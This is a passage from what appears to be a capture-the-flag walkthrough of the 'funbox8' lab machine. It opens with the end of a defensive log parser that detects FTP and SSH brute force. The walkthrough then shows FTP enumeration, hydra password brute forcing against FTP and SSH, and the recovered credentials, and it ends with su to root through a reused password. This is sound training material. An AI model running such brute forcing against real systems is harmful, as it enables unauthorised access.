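    return src[7:] if src.startswith("::ffff:") else src


def parse_line(line, syslog_year=2023):
    """Normalise one log line to {ts, svc, user, src, ok}, or None if unrecognised."""
    m = VSFTPD_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        return {"ts": ts, "svc": "ftp", "user": m["user"], "src": plain_ip(m["src"]), "ok": m["result"] == "OK"}
    m = SSHD_RE.match(line)
    if m:
        # syslog timestamps carry no year; the caller supplies it.
        ts = datetime.strptime(f'{syslog_year} {m["ts"]}', "%Y %b %d %H:%M:%S")
        return {"ts": ts, "svc": "ssh", "user": m["user"], "src": plain_ip(m["src"]), "ok": m["result"] == "Accepted"}
    return None


def detect_bruteforce(lines, window=timedelta(seconds=60), threshold=10):
    """Alert when one source accumulates `threshold` failed logins against one
    service within `window`; call it a spray if several usernames were tried,
    and separately flag a success that lands on top of such a burst."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[(e["src"], e["svc"])].append(e)
    alerts = []
    for (src, svc), evs in by_src.items():
        recent, fired = [], False  # failures still inside the sliding window
        for e in evs:
            recent = [f for f in recent if e["ts"] - f["ts"] <= window]
            if not e["ok"]:
                recent.append(e)
                if len(recent) >= threshold and not fired:
                    users = sorted({f["user"] for f in recent})
                    alerts.append({"src": src, "svc": svc,
                                   "kind": "password spray" if len(users) > 1 else "brute force",
                                   "failures": len(recent), "users": users})
                    fired = True
            elif len(recent) >= threshold:
                alerts.append({"src": src, "svc": svc, "kind": "success after brute force",
                               "failures": len(recent), "users": [e["user"]]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(VSFTPD_LOG + SSHD_LOG):
        print(alert)
```

On the constructed input this raises three alerts: an FTP brute force against jane from 192.168.56.3, a success from the same address while the failure burst is still inside the window (the event that deserves an immediate response, since a valid credential has just been confirmed), and an SSH password spray over five usernames. The single clean login from 192.168.56.10 produces nothing. The same two-stage logic is what fail2ban-style tooling applies before banning an address.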

7.5、FTP login as jim

  • Both SSH-related files are empty
  • And uploading files is forbidden
  • So this user is not much use
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46                
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jim
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||15289|)
150 Here comes the directory listing.
dr-x------    3 1001     1001         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1001     1001          220 May 22  2021 .bash_logout
-rw-r--r--    1 1001     1001         3771 May 22  2021 .bashrc
-rw-r--r--    1 1001     1001          807 May 22  2021 .profile
dr-xr-xr-x    2 1001     1001         4096 May 22  2021 .ssh
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||26295|)
150 Here comes the directory listing.
dr-xr-xr-x    2 1001     1001         4096 May 22  2021 .
dr-x------    3 1001     1001         4096 May 22  2021 ..
-rw-r--r--    1 1001     1001            0 May 22  2021 authorized_keys
-r--------    1 1001     1001            0 May 22  2021 id_rsa
226 Directory send OK.
ftp> put passwd 
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||20802|)
550 Permission denied.

7.6、FTP login as jules

  • Two wordlists found
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jules
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||40874|)
150 Here comes the directory listing.
drwx------    4 1003     1003         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
drwx------    2 1003     1003         4096 May 22  2021 .backups
-rw-------    1 1003     1003           10 May 22  2021 .bash_history
-rw-r--r--    1 1003     1003          220 May 22  2021 .bash_logout
-rw-r--r--    1 1003     1003         3771 May 22  2021 .bashrc
drwx------    2 1003     1003         4096 May 22  2021 .cache
-rw-r--r--    1 1003     1003          807 May 22  2021 .profile
226 Directory send OK.
ftp> cd .cache
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||63865|)
150 Here comes the directory listing.
drwx------    2 1003     1003         4096 May 22  2021 .
drwx------    4 1003     1003         4096 May 22  2021 ..
-rw-r--r--    1 1003     1003            0 May 22  2021 motd.legal-displayed
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd .backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||52228|)
150 Here comes the directory listing.
drwx------    2 1003     1003         4096 May 22  2021 .
drwx------    4 1003     1003         4096 May 22  2021 ..
-r--------    1 1003     1003     139921517 May 22  2021 .bad-passwds
-r--------    1 1003     1003            0 May 22  2021 .forbidden-passwds
-r--------    1 1003     1003          562 May 22  2021 .good-passwd
-r--------    1 1003     1003            0 May 22  2021 .very-bad-passwds
226 Directory send OK.
ftp> lpwd
Local directory: /root/soft/hack
ftp> mget .bad-passwds .good-passwd
mget .bad-passwds [anpqy?]? 
229 Entering Extended Passive Mode (|||36078|)
150 Opening BINARY mode data connection for .bad-passwds (139921517 bytes).
100% |*********************************************************|   133 MiB   68.70 MiB/s    00:00 ETA
226 Transfer complete.
139921517 bytes received in 00:01 (68.67 MiB/s)
mget .good-passwd [anpqy?]? 
229 Entering Extended Passive Mode (|||10353|)
150 Opening BINARY mode data connection for .good-passwd (562 bytes).
100% |*********************************************************|   562      417.04 KiB/s    00:00 ETA
226 Transfer complete.
562 bytes received in 00:00 (195.87 KiB/s)

7.7、Brute-forcing john again

  • login: john password: zhnmju!!!
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -l john -P .bad-passwds -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:14:25
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46   login: john   password: zhnmju!!!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:15:12

7.8、Information gathering as john

  • Hint obtained:
    • Chance R00TPASSWD, because it's the same right now.
    • The root password is probably the same as the one just cracked, most likely zhnmju!!!, since all the other passwords have already been tried
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): john
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||39099|)
150 Here comes the directory listing.
dr-x------    4 1000     1000         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
drwx------    2 1000     1000         4096 May 22  2021 .cache
-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
drwx------    2 1000     1000         4096 May 22  2021 .todo
226 Directory send OK.
ftp> cd .todo
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||11684|)
150 Here comes the directory listing.
drwx------    2 1000     1000         4096 May 22  2021 .
dr-x------    4 1000     1000         4096 May 22  2021 ..
-rwx------    1 1000     1000          131 May 22  2021 todo.list
226 Directory send OK.
ftp> get todo.list
local: todo.list remote: todo.list
229 Entering Extended Passive Mode (|||36045|)
150 Opening BINARY mode data connection for todo.list (131 bytes).
100% |*********************************************************|   131      358.34 KiB/s    00:00 ETA
226 Transfer complete.
131 bytes received in 00:00 (88.59 KiB/s)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat todo.list     
1. Install LAMP
2. Install MAIL-System
3. Install Firewall
4. Install Plesk
5. Chance R00TPASSWD, because it's the same right now.

8、Try logging in to SSH with the FTP passwords

  • login: john password: zhnmju!!!
  • login: jules password: sexylady
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat user     
jane
jim
john
jules
root
                                                                                                      
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat passwd 
password
12345
sexylady
zhnmju!!!

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -L user -P passwd -t 4 192.168.56.46 ssh 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:27:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 16 login tries (l:4/p:4), ~4 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[22][ssh] host: 192.168.56.46   login: john   password: zhnmju!!!
[22][ssh] host: 192.168.56.46   login: jules   password: sexylady
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:27:50

8.1、SSH login as john

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh john@192.168.56.46
john@192.168.56.46's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 01 Dec 2023 09:26:58 AM UTC

  System load:  0.01              Processes:               160
  Usage of /:   88.3% of 4.37GB   Users logged in:         0
  Memory usage: 12%               IPv4 address for enp0s3: 192.168.56.46
  Swap usage:   0%

  => / is using 88.3% of 4.37GB

64 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat May 22 16:03:57 2021 from 192.168.178.143
john@funbox8:~$

8.2、SSH login as jules

Skipped

9、Try switching to root

  • root : zhnmju!!!
john@funbox8:~$ su root
Password: 
root@funbox8:/home/john# cd ~
root@funbox8:~# ls -al
total 52
drwx------  4 root root  4096 May 22  2021 .
drwxr-xr-x 20 root root  4096 May 22  2021 ..
-rw-------  1 root root   238 May 22  2021 .bash_history
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
-rw-r--r--  1 root root   369 May 22  2021 root.flag
-rwxr-xr-x  1 root root    35 May 22  2021 run.sh
drwxr-xr-x  3 root root  4096 May 22  2021 snap
drwx------  2 root root  4096 May 22  2021 .ssh
-rw-------  1 root root 15427 May 22  2021 .viminfo
root@funbox8:~# cat root.flag
|~~          |           |              |    |              |         
|--|   ||/~\ |~~\/~\\/o  | |   ||/~\ /~~|/~\ |~~\|/~\/~//~~||_//~/|/~\
|   \_/||   ||__/\_//\o  |__\_/||   |\__|   ||__/|   \/_\__|| \\/_|   
                                                                    
created by @0815R2d2.

Congrats ! I look forward to see this on my twitter-account :-)
root@funbox8:~#
